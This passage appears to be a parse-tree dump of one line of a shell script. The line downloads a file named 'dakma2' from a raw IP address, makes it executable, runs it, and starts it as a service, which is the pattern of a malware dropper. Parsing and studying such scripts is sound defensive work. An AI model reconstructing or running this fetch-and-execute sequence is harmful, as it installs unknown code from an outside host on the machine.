    WordNode(lineno=15, pos=(1776, 1804), word='http://194.67.209.171/dakma2'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1804, 1805)),
  CommandNode(lineno=15, pos=(1806, 1823), parts=[
    WordNode(lineno=15, pos=(1806, 1811), word='chmod'),
    WordNode(lineno=15, pos=(1812, 1816), word='0777'),
    WordNode(lineno=15, pos=(1817, 1823), word='dakma2'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1823, 1824)),
  CommandNode(lineno=15, pos=(1825, 1833), parts=[
    WordNode(lineno=15, pos=(1825, 1833), word='./dakma2'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1833, 1834)),
  CommandNode(lineno=15, pos=(1835, 1855), parts=[
    WordNode(lineno=15, pos=(1835, 1842), word='service'),
    WordNode(lineno=15, pos=(1843, 1849), word='dakma2'),
    WordNode(lineno=15, pos=(1850, 1855), word='start'),
  ]),
])
